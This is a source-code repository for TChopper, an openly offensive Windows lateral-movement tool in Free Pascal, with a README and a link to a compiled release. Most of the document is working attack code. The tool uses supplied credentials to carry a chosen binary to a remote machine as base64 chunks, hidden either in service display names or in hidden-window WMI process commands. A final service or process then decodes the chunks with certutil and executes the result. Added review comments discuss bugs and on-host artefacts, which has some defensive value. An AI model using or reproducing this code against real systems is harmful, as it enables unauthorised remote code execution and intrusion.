├── README.md
├── chopper.lpi
├── chopper.lpr
├── chopper.lps
└── release
└── chopper.exe
/README.md:
--------------------------------------------------------------------------------
1 | # TChopper
2 |
3 | A new technique I discovered recently and nicknamed "Chop chop": it performs lateral movement using Windows service display names and WMI by smuggling the malicious binary as base64 chunks, and the TChopper tool automates the process.
4 |
5 | [](https://twitter.com/zux0x3a/status/1402327825139441666)
6 |
7 | 
8 |
9 | ## How it works
10 |
11 | * the tool reads the file you wish to smuggle and encodes it as base64 in a memory stream
12 | * splits the output into lines of 150-250 characters (250 is the maximum length allowed for the service's lpDisplayName parameter https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-createservicea).
13 | * in chop chop mode it creates a unique service for each chunk => starts the service => then deletes it to avoid duplicates; alternatively you can choose
14 | the modify-service mode, which is faster and more stable, with the attack mode option (**-m**)
15 | * it then sets the service's lpBinaryPathName parameter to the command line needed to read the service display name and pipe the result into tmp_payload.txt
16 | * finally, after all chunks of the file have been delivered as base64, the tool creates another service to decode the content into a valid executable and run it
17 |
18 | If you are conducting lateral movement with the WMI technique, you can also use Chopper for that:
19 | * TChopper authenticates your session using WMI
20 | * it creates multiple processes, each running a PowerShell command that pipes one segment out to c:\users\public\chop.enc
21 | * it creates a final process that uses certutil to decode the content into a binary and executes it
22 |
23 | 
24 |
25 | ## Usage
26 |
27 | ```
28 | #chop chop mode
29 | chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
30 |
31 |
32 | # chop chop done
33 | chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -f BINARYLOCAL PATH
34 |
35 | # use WMI to smuggle
36 | chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH
37 | ```
38 |
39 | https://youtu.be/xbvhzHul7w0
40 |
41 | ## Detailed research
42 | http://0xsp.com/security%20research%20&%20development%20(SRD)/smuggling-via-windows-services-display-name-lateral-movement
43 |
44 | ## Show support
45 |
46 | I create offsec tools for the open-source community; show your support https://paypal.me/0xsp
47 |
48 |
--------------------------------------------------------------------------------
/chopper.lpi:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/chopper.lpr:
--------------------------------------------------------------------------------
1 | program chopper;
2 |
3 | {$mode Delphi}
4 |
5 | uses
6 | {$IFDEF UNIX}{$IFDEF UseCThreads}
7 | cthreads,
8 | {$ENDIF}{$ENDIF}
9 | Classes, SysUtils,jwawinsvc, windows,base64,comobj,activex,variants,CustApp
10 | { you can add units after this };
11 |
const
  // Declared but not referenced anywhere in this file.
  wbemFlagForwardOnly = $00000020;
  // Assigned to Win32_ProcessStartup.ShowWindow in smuggle_wmi (0 = SW_HIDE),
  // so processes spawned over WMI get no visible window on the target.
  HIDDEN_WINDOW = 0;
15 |
16 |
17 |
18 | type
19 |
20 | { Tchopper }
21 |
{ Command-line application object. DoRun dispatches on the -s / -m / -w
  switches to one of the three techniques implemented below, or prints
  the banner when none is given. }
Tchopper = class(TCustomApplication)
protected
  // Called by Application.Run; validates switches and dispatches.
  procedure DoRun; override;
public
  constructor Create(TheOwner: TComponent); override;
  destructor Destroy; override;
  // Technique #1 (-s): create/start/delete one service per payload chunk.
  procedure chop_chop; virtual;
  // Technique #2 (-m): rewrite the display name of one service per chunk.
  procedure chop_done; virtual;
  // Technique #3 (-w): one remote WMI Win32_Process.Create per chunk.
  procedure s_wmi;virtual;
  // Prints the banner (which doubles as the usage text).
  procedure usage; virtual;
end;
33 |
34 | { Tchopper }
35 |
{ Application entry point: validates the switch set, then dispatches.
  Note that the long name checked for -s ('chopchop') is not the one
  declared to CheckOptions ('chop'), so only the short form works, and
  that the -m / -w branches do not Exit, so control falls through to
  usage and the banner is printed a second time. }
procedure Tchopper.DoRun;
var
  OptErr: String;
begin
  // Reject unknown switches before doing anything else.
  OptErr := CheckOptions('s t u p d f m w', 'chop target username password domain filename chd wmi');
  if OptErr <> '' then
  begin
    ShowException(Exception.Create(OptErr));
    Terminate;
    Exit;
  end;

  // Technique #1 returns immediately.
  if HasOption('s', 'chopchop') then
  begin
    chop_chop;
    Terminate;
    Exit;
  end;

  // Techniques #2 and #3 fall through to usage below.
  if HasOption('m', 'chd') then
  begin
    chop_done;
    Terminate;
  end;
  if HasOption('w', 'wmi') then
  begin
    s_wmi;
    Terminate;
  end;

  usage;
  // Stop the run loop.
  Terminate;
end;
69 |
70 |
71 |
{ Executes one command line on a remote host via WMI.
  Connects to root\CIMV2 on `host` with username/password through
  WbemScripting.SWbemLocator, spawns a Win32_ProcessStartup with
  ShowWindow = HIDDEN_WINDOW, and calls Win32_Process.Create with `chunk`
  as the complete command line. The PID filled in by Create is printed;
  the method's return code is discarded, so the "created successfully"
  line is printed whether or not the call worked.
  Detection note: on the target this is remote WMI process creation, so
  process-creation telemetry that records the parent process is where
  these command lines can be correlated (confirm against sensor coverage).
  FWbemObjectSet, oEnum, iValue, backdoor, srvhost, i and ssl_enabled are
  declared but never used. }
procedure smuggle_wmi(username,password,host,chunk:OLEVariant);
var
  FSWbemLocator : OLEVariant;
  FWMIService : OLEVariant;
  FWbemObjectSet: OLEVariant;
  FWbemObject : OLEVariant;
  oEnum : IEnumvariant;
  iValue : LongWord;
  objProcess : OLEVariant;
  objConfig : OLEVariant;
  ProcessID : Integer;
  backdoor : OLEVariant;
  // username,password,host: OLEVariant;
  srvhost :string;
  i:integer;
  ssl_enabled : Boolean;
begin;
  FSWbemLocator := CreateOleObject('WbemScripting.SWbemLocator');
  // Only host, namespace, user and password are passed; no further
  // ConnectServer options (locale, authority, security flags) are set.
  FWMIService := FSWbemLocator.ConnectServer(host, 'root\CIMV2', username, password);
  FWbemObject := FWMIService.Get('Win32_ProcessStartup');
  objConfig := FWbemObject.SpawnInstance_;
  objConfig.ShowWindow := HIDDEN_WINDOW;
  objProcess := FWMIService.Get('Win32_Process');
  // ProcessID is an out parameter; it is not initialised before the call
  // and the method's return value is not checked.
  objProcess.Create(chunk, null, objConfig, ProcessID);
  Writeln(Format('Pid %d',[ProcessID]));
  writeln('[+] task has been created successfully ..!');
end;
104 |
{ Prints the tool banner and the three usage lines to stdout,
  followed by one empty line. }
procedure banner;
const
  Sep = '-----------------------------------------------------------';
  Lines: array[0..9] of string = (
    Sep,
    '#1 - Smuggling binary via Service DisplayName',
    '#2 - Smuggling binary via WMI',
    'Research : https://bit.ly/3ipnbDT',
    'Author : Lawrence Amer @zux0x3a , https://0xsp.com',
    Sep,
    'USAGE Technique #1: chopper.exe -s -u USERNAME -p PASSWORD -d DOMAIN -t MACHINE -f LOCALBINARYPATH',
    'USAGE Technique #2: chopper.exe -m -u USERNAME -p PASSWORD -d DOMAIN -t MACHINE -f LOCALBINARYPATH',
    'USAGE Technique #3: chopper.exe -w -u DOMAIN\USERNAME -p PASSWORD -t MACHINE -f LOCALBINARYPATH',
    Sep);
var
  Line: string;
begin
  for Line in Lines do
    writeln(Line);
  writeln('');
end;
121 |
{ Reads AFile completely and stores its base64 encoding in Base64.
  Returns False (and leaves Base64 untouched) when the file does not
  exist or is empty; open/read errors propagate as exceptions. }
function FileToBase64(const AFile: String; var Base64: String): Boolean;
var
  Src: TFileStream;
  Raw: String;
begin
  Result := False;
  if not FileExists(AFile) then
    Exit;
  // Same open mode TStream.LoadFromFile uses internally.
  Src := TFileStream.Create(AFile, fmOpenRead or fmShareDenyWrite);
  try
    if Src.Size = 0 then
      Exit;
    // Byte-for-byte copy of the file into an AnsiString buffer.
    SetLength(Raw, Src.Size);
    Src.ReadBuffer(Raw[1], Length(Raw));
  finally
    Src.Free;
  end;
  Base64 := EncodeStringBase64(Raw);
  Result := True;
end;
144 |
// thanks for https://www.swissdelphicenter.ch/
{ Starts sService on sMachine and waits for the SCM to report it RUNNING.
  Opens the SCM with SC_MANAGER_CONNECT and the service with
  SERVICE_START or SERVICE_QUERY_STATUS. After StartService the loop
  re-queries the status every dwWaitHint milliseconds until the state is
  SERVICE_RUNNING, a query fails, or dwCheckPoint goes backwards; there is
  no overall timeout, so a service that stays pending with a stable
  checkpoint keeps this loop waiting. Returns True only if the last status
  read was SERVICE_RUNNING. sMachine is converted with PChar, so an empty
  string is passed as PChar('') (local machine) rather than nil.
  hToken is declared but never used. }
function ServiceStart(
  sMachine,
  sService : string ) : boolean;
var
  schm, schs : SC_Handle;
  ss : TServiceStatus;
  psTemp : pointer;
  dwChkP : DWord;
  hToken: Thandle;
begin
  // Pre-set so the final comparison is well-defined when nothing could be opened.
  ss.dwCurrentState := 0;

  // connect to the service control manager
  schm := OpenSCManager(PChar(sMachine),Nil,SC_MANAGER_CONNECT);

  if(schm > 0)then
  begin
    // open a handle to the specified service with start + query rights
    schs := OpenService(
      schm,
      PChar(sService),
      SERVICE_START or
      SERVICE_QUERY_STATUS);

    if(schs > 0)then
    begin
      // no arguments are handed to the service
      psTemp := Nil;
      if(StartService(
        schs,
        0,
        psTemp))then
      begin
        // check status
        if(QueryServiceStatus(
          schs,
          ss))then
        begin
          while(SERVICE_RUNNING
            <> ss.dwCurrentState)do
          begin
            dwChkP := ss.dwCheckPoint;
            Sleep(ss.dwWaitHint);
            if(not QueryServiceStatus(
              schs,
              ss))then
            begin
              break;
            end;
            // a checkpoint that moves backwards is treated as "no progress"
            if(ss.dwCheckPoint <
              dwChkP)then
            begin
              break;
            end;
          end;
        end;
      end;
      CloseServiceHandle(schs);
    end;
    CloseServiceHandle(schm);
  end;
  Result :=
    SERVICE_RUNNING =
    ss.dwCurrentState;
end;
224 |
225 |
{ Final stage shared by techniques #1 and #2: creates and starts a service
  on sMachine whose binary path is
    cmd.exe /c certutil -decode -f tmp_payload.txt payload.exe & payload.exe
  (note the stray trailing double quote in the literal). The service is
  named 'final_seg' with display name 'Let me in'; these two names plus
  tmp_payload.txt and payload.exe are the on-host artefacts of this step.
  The file paths are relative, so they resolve against the working
  directory of the process the SCM launches (presumably System32 —
  confirm). The service is never deleted here.
  LogonUser (LOGON32_LOGON_NEW_CREDENTIALS) and ImpersonateLoggedOnUser
  results are unchecked; the token is never closed and impersonation is
  never reverted. sService is used only for an OpenService whose handle is
  immediately overwritten by CreateService (leaked if the service already
  existed). Returns the state from the last QueryServiceStatus, or 0. }
function decoder_service(username,password,domain,sMachine, sService: PChar): DWORD;
var
  SCManHandle, SvcHandle: SC_Handle;
  htoken:Thandle;
  SS: TServiceStatus;
  dwStat: DWORD;
  ServiceName,ServiceDisplayName,ServiceExecutable:Pchar;
begin
  servicename := 'final_seg';
  servicedisplayname := 'Let me in';
  ServiceExecutable := pchar('c:\windows\system32\cmd.exe /c certutil -decode -f tmp_payload.txt payload.exe & payload.exe"');

  hToken := 0;
  // In FPC `&` is the identifier-escape prefix, so &hToken is just hToken
  // passed by reference (not a C-style address-of) — confirm.
  LogonUser(username, domain, password,
    LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken);

  ImpersonateLoggedOnUser(hToken);
  dwStat := 0;
  // Open service manager handle.
  SCManHandle := OpenSCManager(sMachine, nil, SC_MANAGER_ALL_ACCESS);
  if (SCManHandle > 0) then
  begin
    // Handle from OpenService is overwritten on the next line.
    SvcHandle := OpenService(SCManHandle, sService, SERVICE_QUERY_STATUS);
    Svchandle := CreateService(SCManHandle,ServiceName,ServiceDisplayName,SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,ServiceExecutable,nil,nil,nil,nil,nil);

    if (SvcHandle > 0) then
    begin
      // SS structure holds the service status (TServiceStatus);
      writeln('[+] executing the payload..');
      ServiceStart(sMachine,servicename);

      if (QueryServiceStatus(SvcHandle, SS)) then
        dwStat := ss.dwCurrentState;
      CloseServiceHandle(SvcHandle);
    end;
    CloseServiceHandle(SCManHandle);
  end;
  Result := dwStat;
end;
271 |
272 |
{ Stops (if needed) and deletes sService on sMachine, then verifies the
  removal by reopening it and checking for ERROR_SERVICE_DOES_NOT_EXIST.
  The stop loop sends SERVICE_CONTROL_STOP, sleeps dwWaitHint and gives up
  when a query fails or the checkpoint goes backwards; there is no overall
  timeout. Returns True only when the verification reopen fails with
  ERROR_SERVICE_DOES_NOT_EXIST. A service that is merely marked for
  deletion because another handle is still open (as when the caller holds
  one, see Get_Create_service) presumably does not satisfy that check —
  confirm. The verification block sits inside the first "schm > 0"
  branch, so a failed SCM connection returns False. }
Function ServiceDelete(sMachine, sService: pchar): Boolean;
Var
  schm, schs: SC_Handle;
  ss: TServiceStatus;
  dwChkP: dword;
Begin
  Result := False;
  schm := OpenSCManager(PChar(sMachine), Nil, SC_MANAGER_CONNECT);
  If schm > 0 Then Begin
    schs := OpenService(schm, PChar(sService),STANDARD_RIGHTS_REQUIRED or SERVICE_STOP Or SERVICE_QUERY_STATUS);
    If schs > 0 Then Begin
      If (QueryServiceStatus(schs, ss)) Then Begin
        // Keep issuing STOP until the SCM reports STOPPED or progress stalls.
        While (SERVICE_STOPPED <> ss.dwCurrentState) Do Begin
          ControlService(schs, SERVICE_CONTROL_STOP, ss);
          dwChkP := ss.dwCheckPoint;
          Sleep(ss.dwWaitHint);
          If (Not QueryServiceStatus(schs, ss)) Then
            Break;
          If (ss.dwCheckPoint < dwChkP) Then
            Break;
        End;
      End;
      // Return value of DeleteService is not checked.
      DeleteService(schs);
      CloseServiceHandle(schs);
    End;
    CloseServiceHandle(schm);

    // If service does not exist, then everything is fine.
    schm := OpenSCManager(PChar(sMachine), Nil, SC_MANAGER_CONNECT);
    If schm > 0 Then Begin
      schs := OpenService(schm, PChar(sService), SERVICE_QUERY_STATUS);
      If schs = 0 Then Begin
        If GetLastError = ERROR_SERVICE_DOES_NOT_EXIST Then
          Result := True;
      End Else Begin
        CloseServiceHandle(schs);
      End;
      CloseServiceHandle(schm);
    End;
  End;
End;
314 |
{ Technique #2 helper: registers the single reusable service 'chopper' on
  sMachine with display name 'NODATA' and a binary path of
    cmd.exe /c powershell -command "Get-Service "chopper" | select -Expand DisplayName | out-file -append tmp_payload.txt"
  i.e. every start appends the service's current display name to
  tmp_payload.txt (relative path). Returns True if CreateService returned
  a handle.
  Neither SCManHandle nor SvcHandle is closed, and the handle from
  OpenService is overwritten by the CreateService result. The try/except
  cannot observe a CreateService failure (Win32 reports it with a 0 return,
  not an exception). When OpenSCManager fails the function returns without
  assigning Result. The LogonUser token is never closed and impersonation
  is never reverted. SS is unused and dwStat is assigned but never read. }
function create_tmp_service(username,password,domain,sMachine:Pchar):boolean;
var
  SCManHandle, SvcHandle: SC_Handle;
  htoken:Thandle;
  SS: TServiceStatus;
  dwStat: DWORD;
  ServiceName,ServiceDisplayName,ServiceExecutable:Pchar;
begin
  servicename := 'chopper';
  ServiceExecutable := pchar('c:\windows\system32\cmd.exe /c powershell -command "Get-Service "'+Pchar(servicename)+'" | select -Expand DisplayName |out-file -append tmp_payload.txt"');
  ServiceDisplayName := 'NODATA';
  hToken := 0;
  LogonUser(username, domain, password,
    LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken);

  ImpersonateLoggedOnUser(hToken);
  dwStat := 0;

  // Open service manager handle.
  SCManHandle := OpenSCManager(sMachine, nil, SC_MANAGER_ALL_ACCESS);
  if (SCManHandle > 0) then
  begin
    SvcHandle := OpenService(SCManHandle, servicename, SERVICE_QUERY_STATUS);
    try
      sleep(1); // thats will sleep for a while to make sure execution is on place
      Svchandle := CreateService(SCManHandle,ServiceName,ServiceDisplayName,SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,ServiceExecutable,nil,nil,nil,nil,nil);
    except on E: exception do
      writeln(E.Message);
    end;
    // Success is judged solely by a non-zero handle.
    if (Svchandle > 0 ) then
      result := true
    else
      result := false;
  end;
end;
{ Technique #2 driver: splits the base64 text `chunk` into 150-character
  pieces and, for each, calls ChangeServiceConfigA on the 'chopper'
  service (created first via create_tmp_service; its result isokay is
  ignored) to set lpDisplayName to the piece, then ServiceStart runs the
  service so its command appends that display name to tmp_payload.txt.
  Result is assigned once per iteration (the last state queried); with
  zero chunks it is never assigned. SvcHandle is closed only when the
  config change succeeded, and status is not reset between iterations.
  The try/except cannot catch a Win32 failure (ChangeServiceConfigA
  reports it by returning False). The LogonUser token is never closed and
  impersonation is never reverted.
  NOTE(review): the service binary is a plain cmd.exe, not a service
  program, so how StartService and the RUNNING wait in ServiceStart
  behave for it is worth confirming. }
function modify_service(username,password,domain,sMachine:Pchar;chunk:string): Dword;
var
  SCManHandle, SvcHandle: SC_Handle;
  htoken:Thandle;
  SS: TServiceStatus;
  dwStat: DWORD;
  ServiceName,ServiceDisplayName,ServiceExecutable:Pchar;
  len,numelem ,i: integer;
  arr : array of string;
  isokay,status : boolean;
begin
  hToken := 0;
  LogonUser(username, domain, password,
    LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken);

  ImpersonateLoggedOnUser(hToken);
  dwStat := 0;

  isokay := create_tmp_service(username,password,domain,sMachine);

  // Split into 150-character pieces; the last one may be shorter.
  len := length(chunk);
  numelem := len div 150;

  if len mod 150 <>0 then
    inc(NumElem);
  setLength(arr,NumElem);

  for i := 0 to High(arr) do
    Arr[i] := copy(chunk,i * 150 + 1, 150);

  for i := 0 to High (arr) do begin
    servicename := 'chopper';
    servicedisplayname := pchar(Arr[i]);

    SCManHandle := OpenSCManager(sMachine, nil, SC_MANAGER_ALL_ACCESS);
    if (SCManHandle > 0) then
    begin
      SvcHandle := OpenService(SCManHandle, servicename, SERVICE_ALL_ACCESS);
      try
        sleep(1); // thats will sleep for a while to make sure execution is on place
        // Everything except lpDisplayName is left as SERVICE_NO_CHANGE / nil.
        status := ChangeServiceConfigA(SvcHandle,SERVICE_NO_CHANGE,SERVICE_NO_CHANGE,SERVICE_NO_CHANGE,nil, nil, nil, nil, nil, nil,servicedisplayname)
      except on E: exception do
        writeln(E.Message);
      end;
      if (status) then
      begin
        writeln('[+] Service modified with the payload chunk');
        ServiceStart(sMachine,servicename);

        if (QueryServiceStatus(SvcHandle, SS)) then
          dwStat := ss.dwCurrentState;
        CloseServiceHandle(SvcHandle);
      end;
      CloseServiceHandle(SCManHandle);
    end;
    Result := dwStat;
  end;
end;
420 |
421 |
{ Technique #1 driver: splits the base64 text `chunk` into 150-character
  pieces and, per piece, creates a service named seg<N> (N counting from
  1) whose display name is the piece and whose binary path is
    cmd.exe /c powershell -command "Get-Service "seg<N>" | select -Expand DisplayName | out-file -append tmp_payload.txt"
  then starts it (ServiceStart) and removes it (ServiceDelete). Service
  names seg1..segN and the relative tmp_payload.txt are the on-host
  artefacts; each iteration also pauses 1 s before CreateService.
  Per iteration LogonUser opens a new token that is never closed, the
  OpenService handle is overwritten by the CreateService one, and
  ServiceDelete runs while SvcHandle is still open here — so its
  ERROR_SERVICE_DOES_NOT_EXIST verification presumably fails and the
  service is only marked for deletion until the handle closes (confirm).
  The try/except cannot catch a Win32 failure (CreateService returns 0).
  Result is assigned once per iteration (last state queried); with zero
  chunks it is never assigned. }
function Get_Create_service(username,password,domain,sMachine: PChar;chunk:string): DWORD;
var
  SCManHandle, SvcHandle: SC_Handle;
  htoken:Thandle;
  SS: TServiceStatus;
  dwStat: DWORD;
  ServiceName,ServiceDisplayName,ServiceExecutable:Pchar;
  len,numelem ,i,ch: integer;
  arr : array of string;
begin
  ch := 0;
  // Split into 150-character pieces; the last one may be shorter.
  len := length(chunk);
  numelem := len div 150;

  if len mod 150 <>0 then
    inc(NumElem);
  setLength(arr,NumElem);

  for i := 0 to High(arr) do
    Arr[i] := copy(chunk,i * 150 + 1, 150);

  for i := 0 to High (arr) do begin
    inc(ch,1);

    servicename := pchar('seg'+inttostr(ch));
    servicedisplayname := pchar(Arr[i]);
    ServiceExecutable := pchar('c:\windows\system32\cmd.exe /c powershell -command "Get-Service "'+Pchar(servicename)+'" | select -Expand DisplayName |out-file -append tmp_payload.txt"');

    hToken := 0;
    LogonUser(username, domain, password,
      LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_WINNT50, &hToken);

    ImpersonateLoggedOnUser(hToken);
    dwStat := 0;
    // Open service manager handle.
    SCManHandle := OpenSCManager(sMachine, nil, SC_MANAGER_ALL_ACCESS);
    if (SCManHandle > 0) then
    begin
      SvcHandle := OpenService(SCManHandle, servicename, SERVICE_QUERY_STATUS);
      try
        sleep(1000); // thats will sleep for a while to make sure execution is on place
        Svchandle := CreateService(SCManHandle,ServiceName,ServiceDisplayName,SERVICE_ALL_ACCESS,SERVICE_WIN32_OWN_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_NORMAL,ServiceExecutable,nil,nil,nil,nil,nil);
      except on E: exception do
        writeln(E.Message);
      end;
      if (SvcHandle > 0) then
      begin
        // SS structure holds the service status (TServiceStatus);
        ServiceStart(sMachine,servicename);
        ServiceDelete(sMachine,servicename);

        if (QueryServiceStatus(SvcHandle, SS)) then
          dwStat := ss.dwCurrentState;
        CloseServiceHandle(SvcHandle);
      end;
      CloseServiceHandle(SCManHandle);
    end;
    Result := dwStat;
  end;
end;
{ Constructs the application and makes an unhandled exception in DoRun
  stop the run loop instead of being swallowed. }
constructor Tchopper.Create(TheOwner: TComponent);
begin
  inherited;
  StopOnException := True;
end;
492 |
{ Nothing of our own to release; defer to TCustomApplication. }
destructor Tchopper.Destroy;
begin
  inherited;
end;
{ Technique #3: deliver the file over WMI and run it.
  Argument loop: -t host, -u username (expected as DOMAIN\USERNAME per the
  banner; -d is not read here), -p password, -f local file. filetobase64
  is called inside the argument loop, i.e. once per argument; until -f has
  been seen filename is '' and the call returns False without touching
  res. The base64 text is cut into 512-character pieces (not the 150 used
  by the service techniques) and each piece is sent as its own
  cmd.exe /c powershell.exe -command that appends the single-quoted chunk
  to c:\Users\Public\chop.enc; every command line, chunk included, is
  echoed to stdout first. After a 1 s pause a final process runs
  certutil -decode on chop.enc into c:\Users\Public\chopper.exe and
  executes it. Nothing checks that the parameters were supplied or that
  the file existed; an empty res yields zero chunks and the decode step
  still runs. The two paths under c:\Users\Public are the on-disk
  artefacts of this mode.
  NOTE(review): out-file's default encoding differs between PowerShell
  versions; whether certutil -decode accepts what lands in chop.enc
  depends on the target's version — confirm. }
procedure Tchopper.s_wmi;
var
  username,password,host,res,process,filename:string;
  i,p:integer;
  len,numelem: integer;
  arr : array of string;
begin
  banner;
  writeln('Technique #3 - Smuggling via WMI');
  for i := 1 to paramcount do begin
    //check arg option
    if (paramstr(i)='-t') then begin
      host := paramstr(i+1);
    end;
    if (paramstr(i)='-u') then begin
      username := paramstr(i+1);
    end;
    if (paramstr(i)='-p') then begin
      password := paramstr(i+1);
    end;
    if (paramstr(i) ='-f') then begin
      filename := paramstr(i+1);
    end;
    // Re-encodes the file on every pass of this loop; return value ignored.
    filetobase64(filename,res);
  end;
  // Split into 512-character pieces; the last one may be shorter.
  len := length(res);
  numelem := len div 512;

  if len mod 512 <>0 then
    inc(NumElem);
  setLength(arr,NumElem);

  for p := 0 to High(arr) do
    Arr[p] := copy(res,p * 512 + 1, 512);

  for p := 0 to High (arr) do begin
    // One remote process per chunk; the full command (with the chunk) is echoed locally.
    process := 'c:\windows\system32\cmd.exe /c powershell.exe -command "'''+Arr[p]+''' |out-file -append c:\Users\Public\chop.enc"';
    writeln(process);
    smuggle_wmi(username,password,host,process);
  end;
  writeln('[+] Prepare to execute ');
  sleep(1000);

  smuggle_wmi(username,password,host,'c:\windows\system32\cmd.exe /c certutil -decode -f c:\Users\Public\chop.enc c:\Users\Public\chopper.exe & c:\Users\Public\chopper.exe');
end;
548 |
{ There is no separate help text: the banner already carries the three
  usage lines, so this just prints it. }
procedure Tchopper.usage;
begin
  banner;
end;
553 |
554 |
555 |
{ Technique #2 entry point. Reads -t machine, -u, -p, -d, -f from the raw
  ParamStr list (an option given last yields '' for its value), base64-
  encodes the file (return value ignored; a missing or empty file leaves
  res = ''), then hands the whole string to modify_service, which rewrites
  the display name of the 'chopper' service once per 150-character chunk,
  and finally to decoder_service, which creates 'final_seg' to reassemble
  and run the payload. Empty strings become PChar('') for the Win32
  calls, so omitting -t (as the README examples for -s/-m do) targets the
  local machine's SCM. The decoder step runs even when the file could not
  be read. }
procedure Tchopper.chop_done;
var
  username,password,domain,machine,filename:string;
  res:string;
  i:integer;
begin
  banner;
  writeln('Technique #2 - Chop Done - Modify Service Display Name');

  for i := 1 to paramcount do begin
    //check arg option
    if (paramstr(i)='-t') then begin
      machine := paramstr(i+1);
    end;
    if (paramstr(i)='-u') then begin
      username := paramstr(i+1);
    end;
    if (paramstr(i)='-p') then begin
      password := paramstr(i+1);
    end;
    if (paramstr(i)='-d') then begin
      domain := paramstr(i+1);
    end;
    if (paramstr(i) ='-f') then begin
      filename := paramstr(i+1);
    end;
  end;

  filetobase64(filename,res);
  writeln('[->] sending payload..as chuncks');
  modify_service(pchar(username),pchar(password),pchar(domain),pchar(machine),res);
  decoder_service(pchar(username),pchar(password),pchar(domain),pchar(machine),'final_seg');
end;
591 |
592 |
593 |
{ Technique #1 entry point. Reads -t machine, -u, -p, -d, -f from the raw
  ParamStr list (an option given last yields '' for its value), base64-
  encodes the file (return value ignored; a missing or empty file leaves
  res = ''), then hands the whole string to Get_Create_service, which
  creates, starts and deletes one seg<N> service per 150-character chunk,
  and finally to decoder_service, which creates 'final_seg' to reassemble
  and run the payload. Empty strings become PChar('') for the Win32
  calls, so omitting -t (as the README examples for -s/-m do) targets the
  local machine's SCM. The decoder step runs even when the file could not
  be read. }
procedure Tchopper.chop_chop;
var
  username,password,domain,machine,filename:string;
  res:string;
  i:integer;
begin
  banner;
  writeln('Technique #1 - Chop Chop - Create/delete');

  for i := 1 to paramcount do begin
    //check arg option
    if (paramstr(i)='-t') then begin
      machine := paramstr(i+1);
    end;
    if (paramstr(i)='-u') then begin
      username := paramstr(i+1);
    end;
    if (paramstr(i)='-p') then begin
      password := paramstr(i+1);
    end;
    if (paramstr(i)='-d') then begin
      domain := paramstr(i+1);
    end;
    if (paramstr(i) ='-f') then begin
      filename := paramstr(i+1);
    end;
  end;

  filetobase64(filename,res);
  writeln('[->] sending payload..as chuncks');
  Get_Create_service(pchar(username),pchar(password),pchar(domain),pchar(machine),res);
  decoder_service(pchar(username),pchar(password),pchar(domain),pchar(machine),'final_seg');
end;
629 |
630 |
631 |
var
  Application: Tchopper;
begin
  // Build the application object, run DoRun (every path in it calls
  // Terminate, so Run returns after one pass), then release it.
  Application:=Tchopper.Create(nil);
  Application.Title:='svc_smuggling';
  Application.Run;
  Application.Free;
end.
640 |
641 |
--------------------------------------------------------------------------------
/chopper.lps:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/release/chopper.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zux0x3a/TChopper/f7383a36af813019ebefb70803dc82a842ed9273/release/chopper.exe
--------------------------------------------------------------------------------